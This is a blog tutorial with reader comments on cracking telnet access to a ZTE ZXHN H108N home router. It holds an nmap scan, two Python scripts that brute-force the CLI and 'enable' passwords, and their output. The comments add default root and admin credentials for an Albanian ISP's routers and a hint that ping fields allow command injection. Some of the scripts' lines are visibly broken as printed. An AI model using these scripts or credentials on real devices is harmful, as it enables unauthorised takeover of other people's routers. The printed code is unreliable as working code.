Hacking ZTE router (ZXHN H108N)

Hello
In this tutorial I will show you how I managed to access the shell of ZTE router, because routers (home routers) have to handle and provide services DHCP service, DNS service, filtering (firewalls) and so on,  each has to have an operating system, to run these services, usually it is Linux that sets behind the scene, operating all these services and the resources of the router (memory. networking… etc.)

I will just show you the access, I will NOT talk about how to exploit anything to narrow the scope of this tutorial.

The Setup
OK, I have a ZTE router: ZXHN H108N, that is I am connected to using wlan0 interface (wireless), and the gateway is 192.168.1.1, my goal is to gain access to the shell!

Reconnaissance and Footprinting
So first thing to do is to scan the ports and OS banner (to determine the OS) and so on! For that I used nmap:

# nmap -F 192.168.1.1 -O
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-20 00:03 EEST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0035s latency).
Not shown: 97 closed ports
PORT
STATE SERVICE
23/tcp open telnet
80/tcp open http
443/tcp open https
MAC Address: 54:22:F8:16:67:1F (zte)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 – 2.6.30
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds

I used a fast scan (-F option) for no reason really, I could do a full TCP scan or even include UDP… but I would like to keep things simple! So as you can see the OS is Linux 2.6.9-30 and there are three ports opened, as we can see from the results this router is running Telnet! This should be fun (and it was!)

Gaining Access
So the next thing is to try and connect to the router via Telnet, so I did the following:

# telnet 192.168.1.1
Trying 192.168.1.1…
Connected to 192.168.1.1.
Escape character is ‘^]’.
************************************************************
Welcome to the world of CLI !
************************************************************
Username:

We need the user name and password to access the CLI (Command Line Interface)! I just tried couple of random usernames (I had 3 chanced before the connection is lost), the first one was “admin” and it returned “% Bad username!” but then I thought to myself: “If I want to access the shell as root… the username should be root right? duh!!!”, so I tried root and it was correct, but for the password I tried couple of known passwords such as {toor, root, admin, admin123, …} none worked (I failed)! I could go on for hours/days/weeks… but I want to access the shell and I wanted NOW!!!

The Attack 0x00
So, what do I have so far?

  • IP address
  • Telnet access (opened)
  • CLI
  • Username

I need the password!

Well… for no reason I decided to write my own tool (in Python) to crack the password, using dictionay attack,  I used a very small wordlist (1275 words only), the wordlist (or dictionary) is made of the most common used passwords, I don’t remember where I got this list from, but it is not important really as you can use any wordlist out there available for free on the web.

#ZTE_Hacking
# execfile('/home/ligeti/Scripts/ZTE_Script.py')
import telnetlib
import time
from sys import stdout

wordlist = '/home/ligeti/wordlists/wordlist.txt'
# Load the wordlist file
with open(wordlist, 'r+') as f:
    # Read the file
    lines = f.readlines()
    # Telnet
    connection = telnetlib.Telnet()
    # Testing
    for password in lines:
        try:
            print '\r' + '\t' + time.ctime(time.time()) + '\t' +
            password.strip('\r\n'),
            stdout.flush()
            # Connect to the router (Telnet)
            connection.open('192.168.1.1')
            # Read until the server/Router asks for username
            chk = connection.read_until("Username:")
            # Send the username (root)
            connection.write("root\n")
            # Read until the server/Router asks for password!
            chk = connection.read_until('Password:')
            #send the password that we are currently testing
            connection.write(password)
            # this is important, I actually don't know
            # how to check if this password is correct
            # but I know that it will keep asking for the password in case if it is not!
            # So I will check for the "Password:" string and if I get a delay
            # for 1 second then this could mean that this is the correct password!
            chk = connection.read_until('Password:', 5)
            # Extra check: checking that the router didn't respond with "% Bad username!"
            if ('Bad' not in chk):
                connection.close()
                print "\nHacked: " + password
                breakconnection.close()
        except Exception, e:
            print 'Error (' + password.strip('\r\n') + '): ' + str(e)

Note: the script is dirty, and I don’t care, all I want is the password! If you are irritated by my script please feel free to post a better one, but please do it quietly please, the script is not the main topic for this thread! Or for any of my threads… ever! I am asking this with all my respect of course.
So here is the output (took a while to finish):

execfile(‘/home/ligeti/Scripts/ZTE_Script.py’)
Tue Jun 24 23:17:13 2014
888888 Error (888888): telnet
connection closed
Tue Jun 24 23:17:46 2014
angela1 Error (angela1): telnet
connection closed
.
.
.
Tue Jun 24 23:31:46 2014
parrot Error (parrot): telnet
connection closed
Tue Jun 24 23:32:10 2014
public
Hacked: public

Bingo! The password is “public”, time to test:

# telnet 192.168.1.1
Trying 192.168.1.1…
Connected to 192.168.1.1.
Escape character is ‘^]’.
************************************************************
Welcome to the world of CLI !
************************************************************
Username:root
Password:
CLI>?
Exec commands:
enable Turn on privileged commands.
exit
Quit from telnet.ping
Ping the destination.
CLI>enable
Password:

Explanation:

  • I connect to 192.168.1.1:23 (telnet).
  • I enter the user name and password (root/public).
  • I see CLI> prompt (similar to Cisco routers) so I try ‘?’ for help.
  • I see enable command, which switch the CLI to config mode.

The Attack 0x01
And now I need the password to enable the config mode, I tested some passwords manually, and I guessed it successfully after few attempts, BUT… let’s try brute-force the damn thing anyway.

The password is alphanumeric, so my charset will be:

>>> string.ascii_letters + string.digits
‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789’

So I need a code to test the combination of all these letters … crazy eh? becaue the total tries for only three characters password would be:

>>> pow(len(string.ascii_letters + string.digits), 3)
238328

And for 8 characters:

>>> pow(len(string.ascii_letters + string.digits), 8)
218340105584896L

I have no time for this … so I will show you a simple script (just for fun), that will check only 3
characters long passwords (and only with string.lowercase charset).

#ZTE_Enable
# execfile('/home/ligeti/Scripts/ZTE_Enable.py')
import telnetlib
import timefrom sys import stdout
import itertools
import string

password = []
connection = telnetlib.Telnet()
print "Connecting to router"
connection.open('192.168.1.1')
print "Connecting to CLI"
chk = connection.read_until('Username:')
connection.write('root\n')
chk = connection.read_until('Password:')
connection.write('public\n')
chk = connection.read_until('CLI>')
print "Generating wordlist"
wordlist = itertools.product(string.lowercase, repeat=3)
for word in wordlist:
    password.append(''.join(word))
    print "Attacking..."
    index = 0
    while (index < len(password)):
        connection.write('enable\n')
        chk = connection.read_until('Password:')
        for i in range(0, 3):
            print '\r' + str(index) + '\t' + time.ctime(time.time()) '\t' + password[index],
 stdout.flush()
            connection.write(password[index] + '\n')
            chk = connection.read_until('Password:', 1)
            index += 1
        if ('Bad' not in chk):
            print "\nHacked: " + password[index-1]
            break

Output (took +4 hours to finish)

>>> execfile(‘/home/ligeti/Scripts/ZTE_Enable.py’)
Connecting to router
+Connecting to CLI
Generating wordlist
Attacking…
17398
Wed Jun 25 00:59:00 2014
Hacked: zte
zte

Yes it was ‘zte’, something I did guess by myself, and with this information I could actually access the config mode:

# telnet 192.168.1.1
Trying 192.168.1.1…
Connected to 192.168.1.1.
Escape character is ‘^]’.

************************************************************
Welcome to the world of CLI !
************************************************************
Username:root
Password:
CLI>?
Exec commands:
enable  Turn on privileged commands.
exit    Quit from telnet.
ping    Ping the destination.
CLI>enable
Password:
CLI#?
Exec commands:
allgreenledon   set all green led on
allledoff       set all led off
allledon        set all led on
configure       Enter configuration mode.
disable         Exit from privilege mode.
exit            Quit from telnet.
macaddr         show or set mac address
ping            Ping the destination.
reboot          Reboot device.
reset           reset device
restoredefault  Reset to factory configuration.
serialnumber    get or set SN
swversion       show software version

I don’t want to make this thread any longer, I know that the subject is boring, but… I had to share (for avery good reason).

So the username and the password for the shell is root:root (was tested manually).

Summary
We connected to the router (192.168.1.1) using telnet, authentication process was in place, we managed to guess the username, and cracked the password using a dictionary (using the tool I scripted in Python), then we found out that there is more to dig into, so we enabled the configuration mode, again we need to login (another authentication process), this time we brute forced the password and gain access, last but not the least, we guessed (easily) the username and password used to access the shell as root!

Conclusion
If your router is using Telnet… get another one! If it does use SSH check the version and security configuration! Be very careful with these issues, a misconfigured network device can be the worse nightmare one can have if a hacker find out about it! So always check and double check your network configuration and devices you use!

Thank you and please leave your comments or questions.

Advertisements

57 thoughts on “Hacking ZTE router (ZXHN H108N)

  1. hello, i have this kind of modem and for me is very dificult to use python
    if you can make any video tutorial from the begining or if is possible to create any batch like
    step1.bat
    step2.bat
    or step1.py
    step2.pyw
    etc to hack easy, because most of us are beginers 🙂
    thank you very much

    Like

    • Hello Tony

      I am working on a video a video tutorial that I will publish shortly, I will contact you (as I see you interested) once it is online.

      Thanks,
      Ligeti

      Like

  2. I’m from Albania
    Our isp block this kind of adsl router
    they give us only user account not admin acoount
    i’m waiting too for this video
    i feed this thread and when the new reply is in this thread i will inform
    thnx for your work

    Like

    • Thanks, currently I am on a tight scedule, going from one project to another, but I will update you guys soon, I am making a full analysis (PT) on ZTE home AP (ZXHN H108N), but I will also cover common vulnerabilities found in other home APs as well.

      I think the first video will be ready next week hopefully.

      And thanks for your commends and interest.

      Like

  3. I dont understand, this:
    lets say everything works so ok, as you say,
    u dont have access to the computer’s OS that using this router to connect to the net,
    but just to a part of the OS that the router use, for its settings, right ?

    so what ?

    Like

    • “part of the OS that the router”, no… you get access to everything, there is no such thing as (part of the OS), it’s or everything or nothing,especially when you are root!
      “So what?” well… ever thought of DNS based attacks? What about modifying the iptables configuration (firewall)?
      What comes after getting the root access is up to you… you can fix it, or beak it!
      Peace.

      Like

  4. i have my own pc and my own router zxhn-h108n
    i have only limited access on that router
    that router work but if i want to use more features like: 1-mac filter, 2-hide my ssid 3-change channel from 1 to 6 or 11, 4-QOS or other things that router really can do..
    only thing i need is to login as admin if you can force change to default password or something like that
    Thats ALL
    THANK YOU FOR YOUR TIME

    Like

  5. hello…im from albania 2,to have full setup access can we downgrade firmware or any mode 2 factory settings,this fucking isp albtelecom albania …..cant do anythink with this modem….and what about usb port ??

    Liked by 1 person

    • Does restoring to factory-default solve that problem? I am not sure how I can help you here as I don’t have much details; I would think that they (the ISP) installed a customized firmware, in that case you should hack your way into the system (using my tutorial or web-based attacks, hint: ping functionality is usually vulnerable to RCE) then you can change the configuration of the router, this is not an easy task for beginners (I am not saying that you are one), and I believe that it will take you couple of days to figure it out (took me few hours to hack it)

      Like

      • Thanks for your answer. I think you are right,the isp has installed a customized firmware and no one including the staff of albtelecom isp know a admin or full access setup of this router,@@@@….I’m thinking to install a firmware from a site I find it around…..if don’t work I haven’t so much time for this router….that hacking method that you tell I don’t know. Thanks again for your time man.

        Like

      • For the Albanian users: Telnet port is open and the credentials are default:
        Username: root
        Password: root

        login as administrator via http:
        Username: admin
        Password: albtelecom12345678

        Good Luck

        Liked by 1 person

  6. I am trying to use an internet uSB dongle to access internet via the same router but i can’t get through (the router and dongles comes from same ISP)
    would you please help

    Like

  7. Hello ligeti.
    I was googling about this model and came across this site.
    Like most users here i am from albania too and have a modem of this model.
    I tried to telnet it and to my surprise the user : root and password root worked and the telnet session gives a promt like this :
    BusyBox v1.01 etc

    THe thing is i am familiar with cisco cli but cant figure out how to use this interface.
    Anyway this modem as you know has a http interface that asks for authentication and the user user log in doesnt give you much privileges , you can only change the isp dial up settings and your wireless security settings. THe question is can find a way to unlock the http username for the admin account so we can configure settings on our modem via the webpage,

    If you can tell me where to start searching for a solution at least i would appreciate it.
    Thanks.

    Like

  8. hello my friend and thank you for that lovely writeup.
    i too have a h108n, and when i try to connect to telnet the connection times out.
    the nmap scan reports the port 23 as “filtered”
    any ideas how to overcome that?

    Like

    • Yes, we believe that there is another vulnerability (at least one) that can open the Telnet port by altering the iptables, but I can’t confirm it now as we are planning to test it this weekend, after that I will make a video and show you how to do a full security assessment for the ZXHN H108N and other AP/Routers.

      So, I will come back to you on this in the couple of days.

      Thanks

      Like

  9. I only need to enable the telnet so i can add static arp client(wake on lan). How i can do this. Note, i have the root password. Thank you.

    Like

    • Hello…
      Did you find a way to do this?
      I am from Greece and i have the same router and i need to enable WOL…
      Thank you in a advance…
      Best regards…

      Like

  10. i tried the scripts with python 3, than i figured it out that was python 2 (that kind of python noob i am)
    but i continue having problems executing the scripts master,
    for example, i get this kind of error message (using my own word list)

    Traceback (most recent call last):
      File "<pyshell#6>", line 1, in <module>
        execfile ('C:\Users\Mr-Bledi\Downloads\Zte_script.py')
      File "C:\Users\Mr-Bledi\Downloads\Zte_script.py", line 21
        chk = connection.read_until(quot;Username:&quot;)
                                        ^
    SyntaxError: invalid syntax
    

    but hey, you know how they say, curiosity killed the cat!
    please i hope you respond fast cos i won’t be here after new year’s eve!
    as i said, just curious!

    CHEERS!

    Like

      • Hi Ligeti..I have a ZTE MF283+ Router for LTE provided by my network here in the Philippines that is Globe. I am located just around 1.5km from the cellsite but with much vegetation, I cannot get a good reception and there is no service. I was trying my mobile and some portion of my home has a 3G signal but I wonder why the router cannot get the 3G signal if the LTE is weak. I check the specifications of the router and it is capable of receiving LTE, 3G, 2G signal. Possibly, I think the network set or lock the router to LTE only reception. I checked the router set up and cannot find any setting options to change the reception for LTE or 3G. Is there a way I can access and unlock the router and change the network or band setting to Auto (LTE or 3G) which ever is available or has stronger signal reception. Can you please help on this thank you.
        rentangz

        Like

    • Hi kamakha,
      I’m trying to use A Bilion 7800N Router behind the ZTE F660 but I can’t get it to work I read in some forum that I should config the F660 as a bridge. If so how could that be done. Any hekp will be appreciated

      Like

  11. Hi guys,
    i have been trying to delete some rules from iptables, but cant save the configuration that has been made.
    i have tried iptables-save, service iptables save, but all failed.

    Router is ZTE zxhn f660 v5.

    is there any other method to change the router iptables/network rules?

    Like

  12. Hi there, I have this router and it is bricked “no access to the web page” Any hints or help to unbricked. I just need a default recovery. The traditional reset button method does not work. I appreciate your help.

    Like

  13. Hi Ligeti,
    Greeting from Jakarta.
    i am Dafi from Indonesia, interesting with this article, it is a nice article even i’m not linuxholic ..haha.
    need your assistant, could you please share with me another tutorial on how to block porn, or adult content thru this device?. Because i have 2 chidlren and i won’t both of them can access as well.

    thank you in advance,

    Like

    • There are many tutorials available online about this subject, I am on the offensive side of security (VA/PT), so this topic won’t fit my blog, my apologies.

      Like

  14. Hi Ligeti,

    Thanks for the interesting article. I was wondering if you might be able to assist in flashing this device to use OpenWRT? Current firmware version is: ZXHN H108NV4.0.1a_ZRQ_ID_D67

    The device is a Telkom Indonesia branded one. I was hoping to use the firmware from https://wiki.openwrt.org/toh/zte/zxhnh108n. What I’ve tried so far:

    1. Download and rename firmware to “ras”.
    2. Boot the device, telnet to it, login and run “sys modelcheck off”.
    3. From the firmware section in the maintenance gui I then add the “ras” file in the firmware section and press the upgrade button.
    4. The firmware seems to be uploaded to the device but I always get an “Error:FAIL TO UPDATE DUE TO…The upload file was not accepted by the router.”.

    Any ideas? Thanks in advance!

    Like

    • I didn’t explore the firmware yet, but soon I will publish some videos that covers all this, all I can recommend is to refer to openwrt community to check this error.

      Like

  15. ZTE ZXHN H108NS here. The only open ports are 21 FTP, 53 DNS, 80 HTTP, and 5555 UPnP. NO TELNET access. Trying to flash OpenWRT Chaos Calmer onto the device but failed while attempting to do it through the web interface (the device will not allow the firmware to upload).

    Like

    • My recommendation is hunt for a command injection vulnerability and search for anything that might look interesting in the current firmware, it’s not an easy task though, and needs dedication (like all other hacking projects).

      Like

  16. is it okay if i use windows? i’m affraid if this job was illegal for my country.
    my laptop has already installed windows (7 btw) from my school.

    Like

    • It is not OK to hack someones AP (even if you mean no harm), you should have a written approval to do so.
      And yes, you can use any OS (Windows, Linux, Android, iOS… so on)…
      Peace

      Like

  17. Hello,
    I have a ZTE H218, and i can access via telnet with user and password that you give. The problem is that with this credentials, i don’t have all permisions, because only i see few things about configuration, and for example i don’t see the routing table. Do you have already video how to execute these pythons scripts and where? Because i want to know if exists other user/password with more privilegies.

    thanks

    Like

  18. Really interesting article, i enjoyed every second reading . Well done !
    I have the same router and i gave it a try but it looks that the ISP have a customized firmware that automatically enters the username ‘admin’ when you try to ‘telent 192.168.1.1’ and you are left only to enter the password for that user name which is also ‘admin’. Commands available when i entered “?” are almost useless , no “enable” here.
    Do not know where to get the stock firmware , Any idea

    Like

  19. Everything works for me except the shell login. Username root and FNNSD3zxhnh168nv31 don’t work. HW version 2.1 SW version 2.1.0T4.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s